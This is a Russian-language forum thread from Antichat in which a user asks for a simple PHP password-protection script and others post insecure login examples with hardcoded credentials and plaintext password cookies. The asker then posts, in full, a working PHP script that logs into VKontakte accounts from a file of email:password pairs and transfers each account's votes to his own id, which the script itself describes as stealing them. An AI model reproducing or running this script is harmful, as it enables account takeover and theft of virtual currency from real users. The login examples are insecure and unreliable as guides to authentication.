Форум АНТИЧАТ - Простейший скрипт авторизации без mysql

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Простейший скрипт авторизации без mysql (https://forum.antichat.xyz/showthread.php?t=143730)

Простейший скрипт авторизации без mysql

Всем доброго времени суток, нужен самый простой скрипт авторизации на пхп без БД, чтобы доступ к странице имел только я.

Заранее спасибо!!!

у меня не работает, выдает просто пустой экран, можно обычный скрипт авторизации с обычной формой, без каких - либо access.php?

PHP код:


		
			
<?php

session_start();

//-----------------//

$login = 'xackep';          // Логин

$password = 'qwerty';      // Пароль

//-----------------//



if (($_COOKIE['login'] == $login) && ($_COOKIE['password'] == $password) || ($_SESSION['password'] == md5($login.':'.$password)))

 {

  echo '<script>alert(\'Вы уже авторизированны\')</script>';

 }

 else

 {

  echo '<html>

         <head>

          <title>Авторизация</title>

         </head>

          <body>         

           <form name="autorization"  action="" method="POST">

            Логин:&nbsp;<input type="text" name="login"><br>

            Пароль:&nbsp;<input type="password" name="password"><br>

            Запомнить&nbsp;<input type=checkbox name="save_cookie" value=1>&nbsp;?<p>

            <input type="submit" name="data" value="Вход">

           </form>

          </body>

         </html>';

  if(($_POST['login']) && ($_POST['password']))

   {

  if((trim($_POST['login']) == $login) && (trim($_POST['password']) == $password))

   {

    if(!$_POST['save_cookie'])

     {

      $_SESSION['password'] = md5($login.':'.$password);

      echo '<script>alert(\'Вы авторизированны! (сессия)\')</script>';

     }

     else

     {

      setcookie("login",$login);

      setcookie("login",$password);

      echo '<script>alert(\'Вы авторизированны! (куки)\')</script>';

     }

   }

   else

   {

    echo '<script>alert(\'Логин или пароль не верны!\')</script>';

   }

  } 

  else

  {

   if((!$_POST['login']) && (!$_POST['password'])) 

   {

   }

   else

   {

   echo '<script>alert(\'Введите все значения!\')</script>';

   }

  }

  }

  /* geforse.name */

?>

"Авторизация на скорую руку" :)
Сохраняет cookie, либо session
*Советую ещё добавить проверку на спец.символы

на денвере работает, на хостинге нет, т.е там php 4. можно что то типа вот этого

http://s56.radikal.ru/i154/0909/a6/4faeee73ac98.jpg

на php4.

Заранее спасибо!

пишет ошибку 500.

вот, что я хочу, впринципе, у меня есть скрипт

PHP код:


		
			
<?php

set_time_limit(0);

error_reporting(1);

$to = "АЙДИ НА КОТОРЫЙ ПЕРЕДАВАТЬ ГОЛОСА"; // vote to id



function curl($url,$post)

{

//echo "$url | $post <br>\n";

$cfile = 'cookies.txt';

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);

curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

curl_setopt($ch, CURLOPT_POST, 1);

$result = curl_exec($ch);

curl_close($ch);

return $result;

};

function transfer_vote($email,$pass,$to){

$result = curl("http://vkontakte.ru/login.php","email=$email&pass=$pass");

$result = curl("http://vkontakte.ru/app614422","");

preg_match("/viewer_id\", \"(.*?)\"/i", $result, $user_id);

preg_match("/balance = (.*?);/i", $result, $vote);

preg_match("/join(.*?)'>/i", $result, $appsl);

preg_match("/app_id = (.*?);/i", $result, $app_id);

preg_match("/app_hash = '(.*?)';/i", $result, $app_hash);

preg_match("/auth_key\", \"(.*?)\"/i", $result, $auth_key);

    if ($vote['1'] >= "1") {

    echo "#Спиздили ".$vote['1']." VOTE...<br>";

    echo "#Всё ok...<br>";

    }

    else {

    echo "#Нету голосов на акке(<br>";

    }

flush();

@ob_flush();

$result = curl("http://vkontakte.ru/apps.php?act=a_settings","app_id=614422&app_hash=".$app_hash['1']."&cn=0&caf=0&caph=0&caa=0&add=".$vote['1']."&withdraw=0");

$result = curl("http://api.vkontakte.fi/votes.php?uid_from=".$user_id['1']."&uid_to=".$to."&votes=".$vote['1']."&auth=".$auth_key['1']);

return $result;

}

echo "<style>body{background-color:#2B2F34;color:#C1C1C7;}input{color:#cccccc;b    order:1px solid #404040;background-color:#221;}red{color:#FF0000}</style> ";

$is_aks = is_file  ("votes.txt");

if($is_aks != 1){

    die('Нету файла с аккаунтами! Создайте файл votes.txt с аккаунтами в виде email@mail.com:password');

}

$aks = file("votes.txt"); // AC file, login:pass

foreach($aks as $k => $v){

$ak = explode(":", trim($v));

echo "<b>--Логинимся--<br>E-mail:".$ak['0'].";password:".$ak['1']."<br>";

$vote_res = transfer_vote($ak['0'],$ak['1'],$to);

echo "------------------------------------------<br>";

flush();

@ob_flush();

}

?>

и файл с акками, так вот, если авторизации не будет, то любой может зайти и украсть мои акки или своровать голоса на свой id, мне надо поставить на этот скрипт защиту паролем. я в php почти ничего не понимаю, подскажите, как защитить скрипт, заранее спасибо!

ВСЕ!!! разобрался - я подключил phpmyadmin, создал там таблицу с юзером, взял готовый скрипт авторизации и переделал его под свою БД. УРА!!!

Вот простейший пример.

PHP код:


		
			
<?php

$login_successful = false;

// check user & pwd:

if (isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])){

    $usr = $_SERVER['PHP_AUTH_USER'];

    $pwd = $_SERVER['PHP_AUTH_PW'];

    if ($usr == 'jonas' && $pwd == 'secret'){

        $login_successful = true;

    }

}

// login ok?

if (!$login_successful){

    // send 401 headers:

    // realm="something" will be shown in the login box

    header('WWW-Authenticate: Basic realm="Secret page"');

    header('HTTP/1.0 401 Unauthorized');

    print "Login failed!n";

}

else {

    // show secret page:

    print 'you reached the secret page!';

}

?>